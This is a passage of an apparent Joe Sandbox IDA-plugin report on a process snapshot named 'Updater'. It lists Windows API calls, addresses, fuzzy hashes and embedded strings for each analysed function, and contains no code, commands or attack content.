                                                                                                  • API String ID: 541375521-0
                                                                                                  • Opcode ID: d084692bfd87856ce016f326c42d71b58327bf1688c5a651a19e13854c3fd489
                                                                                                  • Instruction ID: ce6fadd001e90de495210f2bb3fb45a273c1376e204d8e1c2a3ac82789e2c1af
                                                                                                  • Opcode Fuzzy Hash: d084692bfd87856ce016f326c42d71b58327bf1688c5a651a19e13854c3fd489
                                                                                                  • Instruction Fuzzy Hash: 08610260A483897AFB35DB7088177EAAFB49F02380F084599C5C25B5C3DA5C9E4CCB63
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00736CC9
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00736CE2
                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00736D40
                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00736D50
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00736D62
                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00736DB6
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00736DC4
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00736DD6
                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00736E18
                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00736E2B
                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00736E41
                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00736E4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                  • String ID:
                                                                                                  • API String ID: 3096461208-0
                                                                                                  • Opcode ID: 6cbec6f9d285f59aa78e9d182ff945b0c8ffbd735f8e0f7e109b5d3aab773dbd
                                                                                                  • Instruction ID: 094f1f7e8c77f9f9e9981d1b428e25d1d81abab7bf0f28187afc22b702d19857
                                                                                                  • Opcode Fuzzy Hash: 6cbec6f9d285f59aa78e9d182ff945b0c8ffbd735f8e0f7e109b5d3aab773dbd
                                                                                                  • Instruction Fuzzy Hash: 9D510DB5F10205BFDF18CF68DD85AAEBBB5FB48310F108229F91AE6291D7749D048B64
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4E23: GetWindowLongW.USER32(?,000000EB), ref: 006E4E34
                                                                                                  • GetSysColor.USER32(0000000F), ref: 006E4A11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ColorLongWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 259745315-0
                                                                                                  • Opcode ID: f57cdababe34feb4c115d981855031730293a6aa8c16d9e17891c4d10d6b221f
                                                                                                  • Instruction ID: 71a0aac9bb6d1a9c9461c47676821edf959c9498dede68f1cad6c4b3e8f27e74
                                                                                                  • Opcode Fuzzy Hash: f57cdababe34feb4c115d981855031730293a6aa8c16d9e17891c4d10d6b221f
                                                                                                  • Instruction Fuzzy Hash: B44124315453949FCB309F3DAC48BB93766EB46331F184229F9A3872E9CB758C429B19
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B
                                                                                                    • Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
                                                                                                    • Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8
                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00769555
                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 0076955B
                                                                                                  • ReleaseCapture.USER32 ref: 00769561
                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00769609
                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0076961C
                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 007696FB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID$P3z$P3z
                                                                                                  • API String ID: 1924731296-392432706
                                                                                                  • Opcode ID: 7efbf2b348f458b1b2cb0ddb4b9520a95104ab919af255eab04ef377dad739bd
                                                                                                  • Instruction ID: 576bba87c5487493d376bbd551cacd13929b028744e2fc4f2d789bb6dc3920bd
                                                                                                  • Opcode Fuzzy Hash: 7efbf2b348f458b1b2cb0ddb4b9520a95104ab919af255eab04ef377dad739bd
                                                                                                  • Instruction Fuzzy Hash: 1251BC70604304AFD714DF24C896F6A77E5FB88700F008A2EFA56972E2DB79AD05CB56
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,?,?,00726680,?,0000138C,?,?,?,?,0074EFB0,?), ref: 0073A4E5
                                                                                                  • LoadStringW.USER32(00000000,?,00726680,?), ref: 0073A4EE
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00726680,?,0000138C,?,?,?,?,0074EFB0,?,?), ref: 0073A510
                                                                                                  • LoadStringW.USER32(00000000,?,00726680,?), ref: 0073A513
                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073A634
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                  • API String ID: 747408836-2268648507
                                                                                                  • Opcode ID: 1ccc80bb478f12540caff1b71006ee28412e8d811248e12e17a184ad0b59e945
                                                                                                  • Instruction ID: 460e1d0b243cd9bbef641c92e63d152073f31216551a3bac099f1538dffe76b8
                                                                                                  • Opcode Fuzzy Hash: 1ccc80bb478f12540caff1b71006ee28412e8d811248e12e17a184ad0b59e945
                                                                                                  • Instruction Fuzzy Hash: 3B415072C0020DBADF04EBE0DD96DEE777AAF18340F10406AF506721A2DA396F49CB65
                                                                                                  APIs
                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007649F4
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 007649FB
                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00764A0E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00764A16
                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00764A21
                                                                                                  • DeleteDC.GDI32(00000000), ref: 00764A2B
                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00764A35
                                                                                                  • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00764A4B
                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00764A57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                  • String ID: static
                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                  • Opcode ID: 869b8e4b821485a0e7af4847d3b3ea91e2b07bec8c7d7a299f4b32dccf11a39c
                                                                                                  • Instruction ID: 85e0e5561d26f12abe17c79d01ed98a6f441763d787ee5cd4ea457766d96fad1
                                                                                                  • Opcode Fuzzy Hash: 869b8e4b821485a0e7af4847d3b3ea91e2b07bec8c7d7a299f4b32dccf11a39c
                                                                                                  • Instruction Fuzzy Hash: 61317E31550219BBDF219FA4DC08FDB3BA9FF09314F118215FA66A60A0D779DC10DB98
                                                                                                  APIs
                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00732557,?,?,00000000), ref: 00732926
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 0073292D
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00732557,?,?,00000000), ref: 00732942
                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00732557,?,?,00000000), ref: 0073294A
                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 0073294D
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00732557,?,?,00000000), ref: 0073295D
                                                                                                  • GetCurrentProcess.KERNEL32(W%s,00000000,?,00732557,?,?,00000000), ref: 00732965
                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00732557,?,?,00000000), ref: 00732968
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0073298E,00000000,00000000,00000000), ref: 00732982
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                  • String ID: W%s
                                                                                                  • API String ID: 1957940570-3075281222
                                                                                                  • Opcode ID: 77f895f54aedcc203d2dbb35d5b42cd0277a81dcafa1f349081d54b7717578b2
                                                                                                  • Instruction ID: 4a8a556151ef0fb870c423f2d79f74e60bcfb10aa46a41bbee8abaabd5cf0969
                                                                                                  • Opcode Fuzzy Hash: 77f895f54aedcc203d2dbb35d5b42cd0277a81dcafa1f349081d54b7717578b2
                                                                                                  • Instruction Fuzzy Hash: 8A01BBB5750348BFE720ABA5DC4DF6B7BACEB89711F018411FA05DB2A1CAB59C00CB65
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 007485AC
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00748648
                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 0074865C
                                                                                                  • CoCreateInstance.OLE32(00770CBC,00000000,00000001,00797C9C,?), ref: 007486A8
                                                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0074872D
                                                                                                  • CoTaskMemFree.OLE32(?), ref: 00748785
                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00748810
                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00748833
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0074883A
                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0074888F
                                                                                                  • CoUninitialize.OLE32 ref: 00748895
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2762341140-0
                                                                                                  • Opcode ID: 7b2ac1ccf9922be20abb6126231a6c7c870d6a63020944b368a5962c377c2115
                                                                                                  • Instruction ID: 0d4785a12e125f6651da6eedb3c824d5c603f94d825f19e767d86abfcf3b3c66
                                                                                                  • Opcode Fuzzy Hash: 7b2ac1ccf9922be20abb6126231a6c7c870d6a63020944b368a5962c377c2115
                                                                                                  • Instruction Fuzzy Hash: 36C13D75A00209EFCB54DFA4C884DAEBBB9FF48304B148099E516DB362DB35EE41CB95
                                                                                                  APIs
                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00730B6B
                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00730BCD
                                                                                                  • VariantInit.OLEAUT32(?), ref: 00730BDF
                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00730BFF
                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00730C52
                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00730C66
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00730C7B
                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00730C88
                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00730C91
                                                                                                  • VariantClear.OLEAUT32(?), ref: 00730CA3
                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00730CAE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                  • String ID:
                                                                                                  • API String ID: 2706829360-0
                                                                                                  • Opcode ID: 95d479f2950642001d36f804ac85e706079fd3d4517845e6b49b7717b27ad37b
                                                                                                  • Instruction ID: 09270c843d186359dbeb36b0d5a6041b0adeeec662a87c3e213d09eacc1cb539
                                                                                                  • Opcode Fuzzy Hash: 95d479f2950642001d36f804ac85e706079fd3d4517845e6b49b7717b27ad37b
                                                                                                  • Instruction Fuzzy Hash: 99415E75E00219DFDB10DF94C8589EEBBB9FF48314F008059E952A7262CB78AD45CBA4
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748A68
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748A7C
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00748A9B
                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00748AB3
                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00748AC9
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748ADB
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00748B27
                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00748B30
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                  • String ID: *.*
                                                                                                  • API String ID: 769691225-438819550
                                                                                                  • Opcode ID: 8f03640b4aecbbf6b0f23bef5886a16b755bd097475b559bca9e4fd5721a9ce1
                                                                                                  • Instruction ID: 2883164eae5e51b838c1302634023a84ff12bcd7ca198505fead8042a400c4d3
                                                                                                  • Opcode Fuzzy Hash: 8f03640b4aecbbf6b0f23bef5886a16b755bd097475b559bca9e4fd5721a9ce1
                                                                                                  • Instruction Fuzzy Hash: CD81B2B1A046499FCBA0EF54C844A7EB3E9BF89310F14881EF995CB250DB78E945CB53
                                                                                                  APIs
                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00751186
                                                                                                  • inet_addr.WSOCK32(?), ref: 007511E6
                                                                                                  • gethostbyname.WSOCK32(?), ref: 007511F2
                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00751200
                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00751290
                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007512AF
                                                                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 00751383
                                                                                                  • WSACleanup.WSOCK32 ref: 00751389
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                  • String ID: Ping
                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                  • Opcode ID: f78f15ba928ab9a091056fe2618f5524794fc7da33848260e6d0ae5279eba25e
                                                                                                  • Instruction ID: 735f93bc2c8ed073e92e4426265d4a72d3acd26ab6b41de661409bf7cf10f640
                                                                                                  • Opcode Fuzzy Hash: f78f15ba928ab9a091056fe2618f5524794fc7da33848260e6d0ae5279eba25e
                                                                                                  • Instruction Fuzzy Hash: C791B470604201DFD320DF15C498F5ABBE1BF45319F458599F8698BBA2C7B8ED45CB81
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 007542F1
                                                                                                  • CoUninitialize.OLE32 ref: 007542FB
                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00770B2C,?), ref: 00754367
                                                                                                  • IIDFromString.OLE32(00000000,?), ref: 007543D8
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0075447B
                                                                                                  • VariantClear.OLEAUT32(?), ref: 007544CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                  • API String ID: 636576611-1287834457
                                                                                                  • Opcode ID: d6d4bd25d9bc4f7e8df15e344a74317e78fc3b306245d5f873717936768729fa
                                                                                                  • Instruction ID: 11edb8dff248a79b82536feec79ef144edb7dd83c165309e0fff896812e1e84c
                                                                                                  • Opcode Fuzzy Hash: d6d4bd25d9bc4f7e8df15e344a74317e78fc3b306245d5f873717936768729fa
                                                                                                  • Instruction Fuzzy Hash: 3871AC70608341DFC720DF54C888BAABBE4EF4975AF404449FD85AB261C7B8ED88CB56
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                  • API String ID: 707087890-567219261
                                                                                                  • Opcode ID: bd20fd4da238daa84fd88262f05ce2e8f8c08ae408aded02f29689eda1fca7d6
                                                                                                  • Instruction ID: afc02a230a98c0993337348c857266572e6b673bd7d672f5f691104ef450b24a
                                                                                                  • Opcode Fuzzy Hash: bd20fd4da238daa84fd88262f05ce2e8f8c08ae408aded02f29689eda1fca7d6
                                                                                                  • Instruction Fuzzy Hash: 8F510675A00105DBCF149F28C8415FE73A6EF96311F14862DEE2687395EEB6EC09C791
                                                                                                  APIs
                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF), ref: 00744189
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007441AA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadString$_wcslen
                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                  • API String ID: 4099089115-3080491070
                                                                                                  • Opcode ID: 751c4aafb1f5be5a18cf76928ac5c7e35682f8f9a7a69be9c1d95fd21adfd58d
